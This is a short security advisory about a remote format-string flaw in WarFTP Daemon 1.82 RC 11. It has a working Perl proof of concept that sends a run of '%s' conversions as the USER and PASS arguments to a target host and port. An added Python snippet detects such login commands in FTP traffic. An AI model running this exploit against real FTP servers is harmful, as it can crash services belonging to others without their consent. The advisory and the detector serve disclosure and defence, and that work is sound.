WarFTP Daemon RC 11 Remote Format String Exploit

Summary

WarFTP Daemon 1.82 RC 11 suffers from a remote format string vulnerability.

Credit:

The information has been provided by coolkaveh.


Details

Vulnerable Systems:
 * WarFTP Daemon 1.82 RC 11

# Proof of concept: sends a run of %s conversions as the USER and PASS arguments.
use IO::Socket;
$|=1;
$host=shift || die "$0 \$host \$port\n";
$port=shift || die "$0 \$host \$port\n";
my $username = "%s%s%s%s%s%s%s%s%s%s%s%s";
my $password = "%s%s%s%s%s%s%s%s%s%s%s%s";
print "Launch Attack ... ";
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30) || die "HOST $host PORT $port is down!\n";
if(defined($sock1)){
    $sock1->recv($content, 100, 0);   # read the server banner
    sleep(2);
    $sock1->send("USER ".$username."\r\n", 0);
    $sock1->send("PASS ".$password."\r\n", 0);
    sleep(2);
    $sock1->recv($content, 100, 0);   # read the server's reply, if any
    sleep(5);
    $sock1->close;
}
print "Finish!\n";
exit(1);
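
For detection, the check below flags FTP USER and PASS commands whose argument carries a run of printf conversions, which is what the proof of concept above sends. It is an added example, not part of the original advisory or of WarFTP; the function names, the threshold of 2 and the sample control-channel lines are assumptions constructed for illustration.

```python
import re

# One printf token: either a literal "%%" (harmless) or a real conversion
# "%[n$][flags][width][.precision][length]type", captured in group 1.
TOKEN = re.compile(
    r"%%|(%(?:\d+\$)?[-+ #0]*(?:\d+|\*)?(?:\.(?:\d+|\*)?)?"
    r"(?:hh|h|ll|l|j|z|t|L)?[diouxXeEfFgGaAcspn])"
)


def count_conversions(arg):
    """Number of printf conversions in arg, scanning left to right like printf."""
    return sum(1 for m in TOKEN.finditer(arg) if m.group(1))


def scan_ftp_commands(lines, threshold=2, verbs=("USER", "PASS")):
    """Return (line_number, verb, conversions) for suspicious login commands.

    threshold is an assumed tuning knob: a single conversion can occur in a
    real password ("100%sure"), a run of them does not. The argument itself
    is never returned, so PASS values stay out of the alert stream.
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        verb, _, arg = line.rstrip("\r\n").partition(" ")
        verb = verb.upper()  # FTP command verbs are case-insensitive
        if verb not in verbs:
            continue
        hits = count_conversions(arg)
        if hits >= threshold:
            findings.append((number, verb, hits))
    return findings


# Constructed control-channel lines (not captured traffic).
SAMPLE = [
    "USER alice\r\n",
    "PASS 100%sure\r\n",                      # one conversion: below threshold
    "USER %s%s%s%s%s%s%s%s%s%s%s%s\r\n",      # payload shape used by the PoC
    "pass %s%s%s%s%s%s%s%s%s%s%s%s\r\n",      # lower-case verb, same payload
    "USER 50%%off\r\n",                       # literal percent only
]

if __name__ == "__main__":
    for number, verb, hits in scan_ftp_commands(SAMPLE):
        print(f"line {number}: {verb} argument has {hits} format conversions")
```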

Disclosure Timeline:
Published: 2012-08-31
